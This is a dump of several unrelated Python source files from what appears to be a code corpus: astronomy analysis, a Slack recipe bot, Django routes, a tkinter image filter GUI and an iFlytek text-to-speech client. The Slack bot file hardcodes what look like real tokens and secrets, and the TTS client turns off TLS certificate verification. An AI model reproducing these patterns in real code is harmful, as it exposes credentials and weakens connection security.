astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nfrom astropy.cosmology import FlatLambdaCDM\nfrom astropy import units as u\nplt.close('all') #close any open plots\n\n#%% Check position on chi-flux plot first ###\n\n### Open the fits files and get data ###\ntbdata = fits.open('mag_flux_tables/mag_flux_table_best_extra_clean_no06.fits')[1].data\nchandata = fits.open('mag_flux_tables/xray_mag_flux_table_best_extra_clean_no06.fits')[1].data\nsdata = fits.open('mag_flux_tables/stars_mag_flux_table_extra_clean_no06.fits')[1].data\nsigtb = Table.read('sigma_tables/quad_epoch_sigma_table_extra_clean_no06_2arcsec.fits')\n\ndef prep_data(tbdata):\n ### Remove edges ###\n tbdata = vari_funcs.remove_edges(tbdata)\n \n ## Create arrays of flux values ###\n flux = vari_funcs.flux4_stacks(tbdata)\n \n ### remove values that are negative ###\n flux, tbdata = vari_funcs.noneg(flux, tbdata)\n \n ### Get error arrays ###\n flux, fluxerr, tbdata = vari_funcs.create_quad_error_array(sigtb, tbdata, aper=4)\n \n return flux, fluxerr, tbdata\n\n### Prep data ###\nflux, fluxerr, tbdata = prep_data(tbdata)\nfluxchan, chanerr, chandata = prep_data(chandata)\nsflux, serr, sdata = prep_data(sdata)\n\n\n### reset X-ray column as messed up by stacking ###\ntbdata['X-ray'][tbdata['X-ray']==70] = False \ntbdata['X-ray'][tbdata['X-ray']==84] = True\n\n### Check chisq plot looks correct ###\nfig,_ = vari_funcs.flux_variability_plot(flux, fluxchan, 'chisq', \n fluxerr=fluxerr, chanerr=chanerr,\n starflux=sflux, starfluxerr=serr,\n #normalised=True, \n stars=True, scale='log')\nfig.canvas.mpl_connect('pick_event', vari_funcs.onpickflux_2arcsec)\n\n#varydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe.fits')[1].data\n#varydatalow = vari_funcs.flux_split(varydata, 'lower')\nvarydatalow = fits.open('variable_tables/no06_variables_chi30_2arcsec_spec_DR11.fits')[1].data\n#varydatalow = vari_funcs.flux_split(varydata, 'lower')\n\nvaryfluxlow, varyfluxerrlow, varydatalow = prep_data(varydatalow)\nvarymeanlow = np.nanmean(varyfluxlow, axis=1)\nvarychilow = vari_funcs.my_chisquare_err(varyfluxlow, varyfluxerrlow)\nplt.plot(varymeanlow, varychilow, 'kd', mfc='None')\n\n","sub_path":"lower_properties.py","file_name":"lower_properties.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"68231299","text":"import pandas as pd\nimport os\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.DataFrame({'text':['a..b?!??', '%hgh&12','abc123!!!', '$$$1234']})\n# print(df)\ndf['text'] = df['text'].str.replace(r'[^\\w\\s]+', '')\n# print(df)\n\n\n\nx=6.666\nx=str(x)\nx=x[:4]\n\nx=float(x)\nprint(type(x))\n","sub_path":"Anuja/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"159400823","text":"from concurrent.futures import ThreadPoolExecutor\nfrom glob import glob\n\nimport numpy as np\nimport scipy.misc\nfrom keras.datasets import mnist\n\n\nclass DataLoader:\n\n def __init__(self, dataset_path=\".\", dataset_name='mnist', img_res=(64, 64)):\n self.dataset_name = dataset_name\n self.dataset_path = dataset_path\n self.img_res = img_res\n if self.dataset_name == 'mnist':\n self.dataset = mnist.load_data()\n else:\n 
self.dataset = None\n\n def imread(self, path):\n return scipy.misc.imread(path, mode='RGB').astype(np.float)\n\n def make_image_thumbnail(self, img_path, is_testing=False):\n img = self.imread(img_path)\n img = scipy.misc.imresize(img, self.img_res)\n\n # If training => do random flip\n if not is_testing and np.random.random() < 0.5:\n img = np.fliplr(img)\n\n return img\n\n def load_data(self, batch_size=1, is_testing=False):\n if self.dataset_name == 'mnist':\n (X_train, X_test), (_, _) = self.dataset\n X = X_test if is_testing else X_train\n\n idxs = np.random.randint(0, X.shape[0], size=batch_size)\n imgs = X[idxs]\n\n return_imgs = []\n\n with ThreadPoolExecutor() as executor:\n for img in executor.map(lambda img: scipy.misc.imresize(img, self.img_res), imgs):\n return_imgs.append(img)\n return np.expand_dims(np.array(return_imgs), axis=3) / 127.5 - 1\n elif self.dataset_name == 'img_align_celeba':\n path = glob(self.dataset_path + '/%s/*' % (self.dataset_name))\n\n batch_images = np.random.choice(path, size=batch_size)\n\n return_imgs = []\n with ThreadPoolExecutor() as executor:\n for thumbnail in executor.map(self.make_image_thumbnail, batch_images):\n return_imgs.append(thumbnail)\n\n return np.array(return_imgs) / 127.5 - 1.\n\n return None\n","sub_path":"sagan/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"368067762","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nimport time\nimport urllib.request\n\nfrom recipeSearchKeyword import *\nfrom best_menu import *\nfrom hi import *\nfrom dongheedong import *\nfrom searching import *\nfrom main_keyword import *\nfrom category import *\n\n\nfrom bs4 import BeautifulSoup\nfrom slackclient import SlackClient\nfrom selenium import webdriver\nfrom flask import Flask, request, make_response, render_template\n\n\napp = Flask(__name__)\n\nslack_token = \"xoxb-502761537154-508511707139-8qs5cBjfZqaT87QwRLtIHvV9\"\nslack_client_id = \"502761537154.510016672070\"\nslack_client_secret = \"cd625f3ca20cd0d50cf83c2566587a10\"\nslack_verification = \"Ms4sLMxUfi20iTN3liuT5Tyn\"\nsc = SlackClient(slack_token)\n\ndriver = webdriver.Chrome(r'C:\\Users\\student\\Desktop\\chromedriver.exe')\n# http://cc01b936.ngrok.io/listening\n\n# 사용자 호출 전에 실행되어야 할 것\n# new_ = []\n# 크롤링 함수 구현하기\ntime1 = \"\"\n\ndef _crawl_naver_keywords(text):\n text2 = re.sub('<@\\S+> ','', text)\n FindUrl = \"http://www.10000recipe.com\"\n a = \"http://www.10000recipe.com/recipe/list.html?q=&cat1=&cat2=&cat3=\"\n b = \"&cat4=&order=accuracy&dsearch=©shot=&scrap=°ree=&portion=&time=&niresource=\"\n # new_ = []\n new = [] # 결과 출력 리스트\n line = 1 # 순위, 순번을 나타내는 line\n links = [] #하이퍼링크 추출 후 저장 리스트\n indgre_key = main_keyword(text)\n\n print(indgre_key)\n if int(indgre_key) > 1:\n if indgre_key:\n url = a + str(indgre_key) + b\n source = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(source, \"html.parser\")\n\n #하이퍼링크를 찾아오는 것\n for y in soup.find_all(\"div\", class_=\"col-xs-4\"):\n links.append(FindUrl + y.find(\"a\")[\"href\"])\n for x in soup.find_all(\"h4\", class_=\"ellipsis_title2\"):\n #하이퍼링크 달아주는 부분 + 순서\n new.append(\"<\" + links[line-1] + \"|\" + str(line) + \"번 \" + x.get_text().strip().replace(\"\\n\", ' ').replace(\"★\", \"\")+\">\\n\")\n line += 1\n\n print(links)\n #제목 다는 부분\n return text2 + \"★메뉴 추천★ \\n\" + u'\\n'.join(new)\n return _crawl_naver_keywords(text)\n else:\n if \"인기블로거\" in text2:\n return 
best_menu(text2)\n elif \"냉부\" in text2:\n return hi(text2)\n\n # 쿡봇쓰기 전 쿡봇 깨우기\n elif \"안녕\" in text2:\n answer = \"1.재료별 카테고리를 입력하세요\\n\\n : 소고기, 돼지고기, 닭고기, 육류,\\n\\n 채소류, 해물류,달걀, 유제품,\\n\\n 가공식품류, 쌀, 밀가루, 건어물류, 버섯류,\\n\\n 과일류, 콩, 견과류, 곡류, 기타 \\n\\n\\n\\n2. 원하는거 아무거나 입력하세요 \\n\\n\\n\\n3. '오늘', '오늘 순위'를 검색하면 오늘의 인기 요리!\\n\\n\\n\\n4. '냉장고를 부탁해' 쉐프들의 요리가 궁금하다면!? : '냉부'검색!\\n\\n\\n\\n5. 인기요리블로거가 궁금하다면 '인기블로거'검색까지!\\n\\n\\n\"\n\n return answer\n elif \"추천\" in text2:\n answer = \"1.재료별 카테고리를 입력하세요\\n\\n : 소고기, 돼지고기, 닭고기, 육류,\\n\\n 채소류, 해물류,달걀, 유제품,\\n\\n 가공식품류, 쌀, 밀가루, 건어물류, 버섯류,\\n\\n 과일류, 콩, 견과류, 곡류, 기타 \\n\\n\\n\\n2. 원하는거 아무거나 입력하세요 \\n\\n\\n\\n3. '오늘', '오늘 순위'를 검색하면 오늘의 인기 요리!\\n\\n\\n\\n4. '냉장고를 부탁해' 쉐프들의 요리가 궁금하다면!? : '냉부'검색!\\n\\n\\n\\n5. 인기요리블로거가 궁금하다면 '인기블로거'검색까지!\\n\\n\\n\"\n\n\n return answer\n\n # 오늘의 순위와 오늘의 메뉴 들\n elif \"오늘\" in text2:\n return crawl_detail_recipe1(text2, driver)\n elif \"오늘 순위\" in text2:\n return crawl_detail_recipe1(text2, driver)\n\n # 재료 또는 메뉴를 검색해서 selenium\n else:\n return crawl_detail_recipe(text2, driver)\n\n# 이벤트 핸들하는 함수\ndef _event_handler(event_type, slack_event):\n print(slack_event[\"event\"])\n\n if event_type == \"app_mention\":\n # msg = {}\n channel = slack_event[\"event\"][\"channel\"]\n text = slack_event[\"event\"][\"text\"]\n keywords = _crawl_naver_keywords(text)\n # msg['text'] = text\n # msg[\"image_url\"] = \"http://recipe1.ezmember.co.kr/img/thumb_over.png\"\n\n # menus = choice_menu(text)\n # if \"오늘\"in text:\n # sc.api_call(\n # \"chat.postMessage\",\n # channel=channel,\n # text=keywords,\n # attachments = json.dumps([msg])\n # )\n # else:\n sc.api_call(\n \"chat.postMessage\",\n channel=channel,\n text=keywords\n # if \"오늘\" in text:\n # attachments = json.dumps([msg])\n )\n\n\n return make_response(\"App mention message has been sent\", 200, )\n\n # ============= Event Type Not Found! ============= #\n # If the event_type does not have a handler\n message = \"You have not added an event handler for the %s\" % event_type\n # Return a helpful error message\n return make_response(message, 200, {\"X-Slack-No-Retry\": 1})\n\n\n@app.route(\"/listening\", methods=[\"GET\", \"POST\"])\ndef hears():\n global time1\n slack_event = json.loads(request.data)\n\n if \"challenge\" in slack_event:\n return make_response(slack_event[\"challenge\"], 200, {\"content_type\":\n \"application/json\"\n })\n\n if slack_verification != slack_event.get(\"token\"):\n message = \"Invalid Slack verification token: %s\" % (slack_event[\"token\"])\n make_response(message, 403, {\"X-Slack-No-Retry\": 1})\n global time1\n if \"event\" in slack_event:\n event_type = slack_event[\"event\"][\"type\"]\n if slack_event[\"event\"][\"event_ts\"] != time1:\n time1 = slack_event[\"event\"][\"event_ts\"]\n return _event_handler(event_type, slack_event)\n else:\n return make_response(\"duple\", 200,)\n\n # If our bot hears things that are not events we've subscribed to,\n # send a quirky but helpful error response\n return make_response(\"[NO EVENT IN SLACK REQUEST] These are not the droids\\\n you're looking for.\", 404, {\"X-Slack-No-Retry\": 1})\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n return \"
Server is readysssssss
\"\n\n\nif __name__ == '__main__':\n app.run('127.0.0.1', port=5222)\n","sub_path":"onedayonefood/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"362150254","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom blog.views import DuplicationCheck\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^post/', include('blog.urls')),\n #중략\n url(r'^signup/$','blog.views.signup', name='signup'),\n url(r'^signup_ok/$',TemplateView.as_view(template_name='registration/signup_ok.html'), name='signup_ok'),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login', name='login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': '/accounts/login/',}, name='logout_url'),\n url(r'^duplcheck$', DuplicationCheck.as_view(), name='duplcheck'),\n url(r'^photo/', include('photo.urls')),\n\n #summernote\n url(r'^summernote/', include('django_summernote.urls')),\n]\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n","sub_path":"myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573309394","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020-05-25\n# @Author : Joey Jiang\n# @File : test_base11_3_1.py\n# @Software : PyCharm\n# @Description: 文件上传弹框处理\n'''\n文件上传\n\ninput标签:\n ele=driver.find_element(By.ID,\"上传按钮id\")\n ele.send_keys(\"文件路径+文件名\")\n\n问题是click()方法写错了,但是系统没有报错\n'''\nfrom time import sleep\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass TestFileUpload:\n def setup(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.implicitly_wait(3)\n def teardown(self):\n self.driver.quit()\n def test_file_upload(self):\n self.driver.get(\"https://image.baidu.com\")\n sleep(2)\n self.driver.find_element(By.XPATH,'//*[@id=\"sttb\"]/img[1]').clik()\n self.driver.find_element(By.ID,\"stfile\").send_keys(\"G:/python/1.png\")\n sleep(3)\n # 有问题","sub_path":"python_base/base11/base11_3/test_base11_3_1.py","file_name":"test_base11_3_1.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"261543476","text":"import sys\n\ndef main(filename):\n file=open(filename)\n for line in file:\n list=[]\n list1=[]\n list2=[]\n for word in line.split():\n list.append(word)\n if word not in list1:\n list1.append(word)\n list2.append(word)\n elif word in list1:\n try:\n list2.remove(word)\n except ValueError:\n pass\n try:\n print(list.index(min(list2))+1)\n except ValueError:\n print(0)\nmain(sys.argv[1])\n","sub_path":"Python/complete/lowestuniquenumber.py3","file_name":"lowestuniquenumber.py3","file_ext":"py3","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"41186594","text":"import tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter import Button\n\nfrom Filter import *\nfrom ImageContainer import *\n\nclass MainWindow(tk.Frame):\n def __init__(self, root):\n super().__init__(root)\n\n # self.namelabel = tk.Label(text=\"Image Processor\")\n # 
self.namelabel.grid(row=0, column=0, columnspan=1)\n\n self.imgForProcessing = None\n self.img_id = None\n self.processor = None\n\n self._canvasSize = (900, 720)\n self._histo_canvas_size = (256, 256)\n\n self.canvas = None\n self.photoImg = None\n\n self.loadBtn = None\n\n self.histo_canvas = None\n\n self.grayscaleBtn = None\n\n self.negBtn = None\n self.neg_scale = None\n\n self.solBtn = None\n self.sol_spin = None\n\n self.contrastIncBtn = None\n self.contrast_inc_spin_from = None\n self.contrast_inc_spin_to = None\n\n self.contrastDecBtn = None\n self.contrast_dec_spin_from = None\n self.contrast_dec_spin_to = None\n\n self.smoothBtn = None\n\n self.kirsch_op_button = None\n\n self.adaptive_binarization_btn = None\n self.adaptive_bin_spin_radius = None\n\n self.rotation_button = None\n self.choose_angle_spin = None\n self.choose_axis_x_spin = None\n self.choose_axis_y_spin = None\n\n self.resampling_button = None\n self.choose_scale_spin = None\n\n self.rect = None\n self.started_rect_coords = []\n\n self.selected_area = []\n\n self.search_line_button = None\n self.pre_work_button = None\n\n self.search_circle_button = None\n\n self.initLoad()\n\n def initLoad(self):\n self.loadBtn = Button(text=\"Нажми\",\n relief=\"flat\",\n font=\"Times 12\",\n height=50,\n width=200,\n command=self.loadBtnClicked)\n\n self.loadBtn.grid(row=15, column=14)\n\n def initMain(self):\n self.loadBtn.grid_remove()\n\n self.canvas = tk.Canvas(background=\"#008B8B\", width=self._canvasSize[0], height=self._canvasSize[1])\n self.canvas.grid(row=0, column=5, rowspan=30)\n\n self.grayscaleBtn = Button(text=\"В оттенках серого\",\n font=\"Times 12 bold\",\n bg = \"#48D1CC\",\n relief=\"flat\",\n width=30,\n command=self.grayscaleBtnClicked)\n\n self.grayscaleBtn.grid(row=13, column=0, columnspan=4)\n\n self.resampling_button = Button(text=\"Масштабирование\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg = \"#48D1CC\",\n width=20,\n command=self.resampling_button_clicked)\n self.resampling_button.grid(row=14, column=0, columnspan=2)\n self.choose_scale_spin = tk.Spinbox()\n self.choose_scale_spin.grid(row=14, column=2, columnspan=2)\n\n self.kirsch_op_button = Button(text=\"Кирша\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=30,\n command=self.kirsch_operator_btn_clicked)\n self.kirsch_op_button.grid(row=15, column=0, columnspan=4)\n\n self.adaptive_binarization_btn = Button(text=\"Бинаризация\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.adaptive_binarization_btn_clicked)\n self.adaptive_binarization_btn.grid(row=16, column=0, columnspan=2)\n self.adaptive_bin_spin_radius = tk.Spinbox(from_=3, to=15)\n self.adaptive_bin_spin_radius.grid(row=16, column=2, columnspan=2)\n\n self.rotation_button = Button(text=\"Поворот\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.rotation_button_clicked)\n\n self.rotation_button.grid(row=17, column=0, columnspan=2)\n self.choose_angle_spin = tk.Spinbox(from_=0, to=360)\n self.choose_angle_spin.grid(row=17, column=2, columnspan=2)\n self.choose_axis_x_spin = tk.Spinbox()\n self.choose_axis_x_spin.grid(row=18, column=1)\n self.choose_axis_y_spin = tk.Spinbox()\n self.choose_axis_y_spin.grid(row=18, column=3)\n\n self.search_line_button = Button(text=\"LINE\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.search_line_button_clicked)\n\n self.search_line_button.grid(row=19, column=0, columnspan=2)\n\n 
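The MainWindow record here drives all of its image operations through a Filter class imported from a Filter module that is not part of this dataset entry, so methods like Filter.kirsch_operator and Filter.adaptive_binarization are visible only by name. As a rough sketch of what one of them might look like, here is a minimal local-mean adaptive binarization over a grayscale NumPy array; the function name, signature, and offset parameter are illustrative assumptions, not taken from the record:

```python
import numpy as np
from scipy.ndimage import uniform_filter


def adaptive_binarization(gray, radius=7, offset=5):
    """Threshold each pixel against the mean of its (2*radius+1)^2 neighborhood."""
    gray = gray.astype(np.float32)
    local_mean = uniform_filter(gray, size=2 * radius + 1)  # box filter = local mean
    # Pixels brighter than their local mean (minus a small offset) become white.
    return np.where(gray > local_mean - offset, 255, 0).astype(np.uint8)
```

The radius argument lines up with the 3-15 range the record exposes through tk.Spinbox(from_=3, to=15).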
self.pre_work_button = Button(text=\"preWork\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.pre_work_button_clicked)\n\n self.pre_work_button.grid(row=20, column=0, columnspan=2)\n\n self.search_circle_button = Button(text=\"Circle\",\n font=\"Times 12 bold\",\n relief=\"flat\",\n bg=\"#48D1CC\",\n width=20,\n command=self.search_circle_button_clicked)\n\n self.search_circle_button.grid(row=21, column=0, columnspan=2)\n\n self.canvas.bind(\"\", self.mouse_clicked_handler)\n self.canvas.bind(\"\", self.mouse_down_handler)\n\n self._drawImage()\n\n def loadImg(self):\n file_name = fd.askopenfilename(title=\"Выбрать изображение\",\n filetypes=((\"jpeg files\", \"*.jpg\"),\n (\"jpeg files\", \"*.jpeg\"),\n (\"png files\", \"*.png\"),\n (\"GIF files\", \"*.gif\"),\n (\"bmp files\", \"*.bmp\")))\n\n self.imgForProcessing = ImageContainer(file_name)\n self.photoImg = ImageTk.PhotoImage(self.imgForProcessing.get_img())\n\n self.initMain()\n\n def loadBtnClicked(self):\n self.loadImg()\n\n def _drawImage(self):\n self.canvas.delete(\"all\")\n\n size = self.imgForProcessing.getSize()\n if size[0] > self._canvasSize[0] or size[1] > self._canvasSize[1]:\n self.photoImg = ImageTk.PhotoImage(self.imgForProcessing.imgScale(self._canvasSize))\n\n self.img_id = self.canvas.create_image(self._canvasSize[0] / 2, self._canvasSize[1] / 2,\n image=self.photoImg)\n\n def _apply_filter(self, filter, **kwargs):\n self.imgForProcessing.applyFilter(filter, **kwargs)\n self.photoImg = ImageTk.PhotoImage(self.imgForProcessing.get_img())\n\n self._drawImage()\n\n def grayscaleBtnClicked(self):\n self._apply_filter(Filter.grayscale)\n\n def neg_btn_clicked(self):\n threshold_value = self.neg_scale.get()\n self._apply_filter(Filter.negative, threshold=threshold_value)\n\n def sol_btn_clicked(self):\n k_value = float(self.sol_spin.get())\n self._apply_filter(Filter.solarisation, k=k_value)\n\n def contrast_increase_btn_clicked(self):\n min_val = int(self.contrast_inc_spin_from.get())\n max_val = int(self.contrast_inc_spin_to.get())\n\n self._apply_filter(Filter.inc_contrast, min=min_val, max=max_val)\n\n def contrast_decrease_btn_clicked(self):\n min_val = int(self.contrast_inc_spin_from.get())\n max_val = int(self.contrast_inc_spin_to.get())\n\n self._apply_filter(Filter.dec_contrast, min=min_val, max=max_val)\n\n def kirsch_operator_btn_clicked(self):\n self._apply_filter(Filter.kirsch_operator)\n\n def adaptive_binarization_btn_clicked(self):\n radius = int(self.adaptive_bin_spin_radius.get())\n\n self._apply_filter(Filter.adaptive_binarization, radius=radius)\n\n def mouse_down_handler(self, event):\n self.canvas.delete(self.rect)\n self.selected_area = [self.started_rect_coords[0], self.started_rect_coords[1], event.x, event.y]\n self.rect = self.canvas.create_rectangle(self.selected_area)\n\n def mouse_clicked_handler(self, event):\n self.canvas.delete(self.rect)\n self.started_rect_coords = [event.x, event.y]\n\n def rotation_button_clicked(self):\n angle_val = int(self.choose_angle_spin.get()) * math.pi / 180\n axis_x_val = self.choose_axis_x_spin.get()\n axis_y_val = self.choose_axis_y_spin.get()\n\n self.fix_region_coords()\n self._apply_filter(Filter.rotation, angle=angle_val, area=self.selected_area, c_x=axis_x_val, c_y=axis_y_val)\n\n def search_line_button_clicked(self):\n self._apply_filter(Filter.searchLine)\n\n def search_circle_button_clicked(self):\n self._apply_filter(Filter.searchCircle)\n\n def pre_work_button_clicked(self):\n 
self._apply_filter(Filter.pre_work)\n\n def resampling_button_clicked(self):\n scale_val = float(self.choose_scale_spin.get())\n\n self.fix_region_coords()\n self._apply_filter(Filter.biquadratic_resampling, area=self.selected_area, scale=scale_val)\n\n def fix_region_coords(self):\n img_size = self.imgForProcessing.getSize()\n img_left_corner_coords = [self.canvas.coords(self.img_id)[0] - img_size[0] // 2,\n self.canvas.coords(self.img_id)[1] - img_size[1] // 2]\n\n self.selected_area[0] -= img_left_corner_coords[0]\n self.selected_area[1] -= img_left_corner_coords[1]\n self.selected_area[2] -= img_left_corner_coords[0]\n self.selected_area[3] -= img_left_corner_coords[1]\n","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":10706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"236152513","text":"# -*- coding:utf-8 -*-\n#\n# author: iflytek\n#\n# 本demo测���时运行的环境为:Windows + Python3.7\n# 本demo测试成功运行时所安装的第三方库及其版本如下:\n# cffi==1.12.3\n# gevent==1.4.0\n# greenlet==0.4.15\n# pycparser==2.19\n# six==1.12.0\n# websocket==0.2.1\n# websocket-client==0.56.0\n#\n# 错误码链接:https://www.xfyun.cn/document/error-code (code返回错误码时必看)\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\nimport websocket\nimport datetime\nimport hashlib\nimport base64\nimport hmac\nimport json\nfrom urllib.parse import urlencode\nimport time\nimport ssl\nfrom wsgiref.handlers import format_date_time\nfrom datetime import datetime\nfrom time import mktime\nimport _thread as thread\nimport os\nimport traceback\nfrom tqdm import tqdm\nimport wave\nfrom .audio_convert import pcm2wav\nfrom utils.crypt import decrypt_express\nfrom constants.common import CommonConstants\n\n\nSTATUS_FIRST_FRAME = 0 # 第一帧的标识\nSTATUS_CONTINUE_FRAME = 1 # 中间帧标识\nSTATUS_LAST_FRAME = 2 # 最后一帧的标识\n\n\nclass Ws_Param(object):\n # 初始化\n def __init__(self, APPID, APIKey, APISecret, Text):\n self.APPID = APPID\n self.APIKey = APIKey\n self.APISecret = APISecret\n self.Text = Text\n\n # 公共参数(common)\n self.CommonArgs = {\"app_id\": self.APPID}\n # 业务参数(business),更多个性化参数可在官网查看\n self.BusinessArgs = {\"aue\": \"raw\", \"auf\": \"audio/L16;rate=16000\", \"vcn\": \"xiaoyan\", \"tte\": \"utf8\"}\n # print(self.Text)\n self.Data = {\"status\": 2, \"text\": str(base64.b64encode(self.Text.encode('utf-8')), \"UTF8\")}\n\n # 生成url\n def create_url(self):\n url = 'wss://tts-api.xfyun.cn/v2/tts'\n # 生成RFC1123格式的时间戳\n now = datetime.now()\n date = format_date_time(mktime(now.timetuple()))\n\n # 拼接字符串\n signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\n signature_origin += \"date: \" + date + \"\\n\"\n signature_origin += \"GET \" + \"/v2/tts \" + \"HTTP/1.1\"\n # 进行hmac-sha256进行加密\n signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\n digestmod=hashlib.sha256).digest()\n signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\n\n authorization_origin = \"api_key=\\\"%s\\\", algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\n self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\n authorization = base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\n # 将请求的鉴权参数组合为字典\n v = {\n \"authorization\": authorization,\n \"date\": date,\n \"host\": \"ws-api.xfyun.cn\"\n }\n # 拼接鉴权参数,生成url\n url = url + '?' 
+ urlencode(v)\n # print(\"date: \",date)\n # print(\"v: \",v)\n # 此处打印出建立连接时候的url,参考本demo的时候可取消上方打印的注释,比对相同参数时生成的url与自己代码生成的url是否一致\n # print('websocket url :', url)\n return url\n\n\ndef text_byte_num_cut(text, byte_limit):\n split_text_list = []\n single_text = ''\n for char_ in text:\n if len((single_text+char_).encode('utf-8')) >= byte_limit:\n split_text_list.append(single_text)\n single_text = ''\n single_text += char_\n split_text_list.append(single_text)\n return split_text_list\n\n\ndef run_tts(Text, serial_no, input_file_path):\n audio_name_prefix = os.path.basename(os.path.dirname(input_file_path))\n audio_output_path = os.path.join(os.path.dirname(input_file_path), '{}_audio'.format(audio_name_prefix))\n\n if os.path.exists(os.path.join(audio_output_path, '{}-{}.wav'.format(audio_name_prefix, serial_no))):\n return\n\n try:\n os.mkdir(audio_output_path)\n except:\n pass\n\n txt_path = os.path.join(audio_output_path, '{}-{}.txt'.format(audio_name_prefix, serial_no))\n with open(txt_path, 'w', encoding='utf-8') as f:\n f.write(Text)\n\n def on_message(ws, message):\n pcm_path = os.path.join(audio_output_path, '{}-{}.pcm'.format(audio_name_prefix, serial_no))\n # wav_path = os.path.join(audio_output_path, '{}-{}.wav'.format(audio_name_prefix, serial_no))\n try:\n message = json.loads(message)\n code = message[\"code\"]\n sid = message[\"sid\"]\n audio = message[\"data\"][\"audio\"]\n audio = base64.b64decode(audio)\n status = message[\"data\"][\"status\"]\n if status == 2:\n print(\"ws is closed\")\n ws.close()\n if code != 0:\n errMsg = message[\"message\"]\n print(\"sid:%s call error:%s code is:%s\" % (sid, errMsg, code))\n else:\n with open(pcm_path, 'ab') as f:\n f.write(audio)\n except Exception as e:\n print(\"receive msg,but parse exception:\", e)\n print(traceback.format_exc())\n\n def on_error(ws, error):\n print(\"### error:\", error)\n\n def on_close(ws):\n print(\"### closed ###\")\n\n def on_open(ws):\n def run(*args):\n d = {\"common\": wsParam.CommonArgs,\n \"business\": wsParam.BusinessArgs,\n \"data\": wsParam.Data,\n }\n d = json.dumps(d)\n # print(\"------>开始发送文本数据\")\n ws.send(d)\n # if os.path.exists('./demo.pcm'):\n # os.remove('./demo.pcm')\n\n thread.start_new_thread(run, ())\n\n wsParam = Ws_Param(\n APPID=decrypt_express(os.getenv(CommonConstants.PW), CommonConstants.TTS_APPID),\n APIKey=decrypt_express(os.getenv(CommonConstants.PW), CommonConstants.TTS_APIKEY),\n APISecret=decrypt_express(os.getenv(CommonConstants.PW), CommonConstants.TTS_APISECRET),\n Text=Text\n )\n websocket.enableTrace(False)\n wsUrl = wsParam.create_url()\n ws = websocket.WebSocketApp(wsUrl, on_message=on_message, on_error=on_error, on_close=on_close)\n ws.on_open = on_open\n ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\n\n for pcm_file in [os.path.join(audio_output_path, i) for i in os.listdir(audio_output_path) if os.path.splitext(i)[-1] == '.pcm']:\n pcm2wav(pcm_file)\n os.remove(pcm_file)\n\n\ndef tts_run_total(txt_file_path):\n # 待合成文本内容\n with open(txt_file_path, 'r', encoding='utf-8') as f:\n text = f.read().replace('\\n', \"\")\n print('总字数:', len(text))\n text_list = text_byte_num_cut(text, 7998)\n print('分段数:', len(text_list))\n\n for i, text in enumerate(tqdm(text_list), start=1):\n i = str(i).zfill(3)\n run_tts(text, i, txt_file_path)\n\n return os.path.join(os.path.dirname(txt_file_path), '{}_audio'.format(os.path.basename(os.path.dirname(txt_file_path))))\n\n\nif __name__ == \"__main__\":\n tts_run_total(r\"E:\\python\\pdf_convert\\数据\\精要主义 
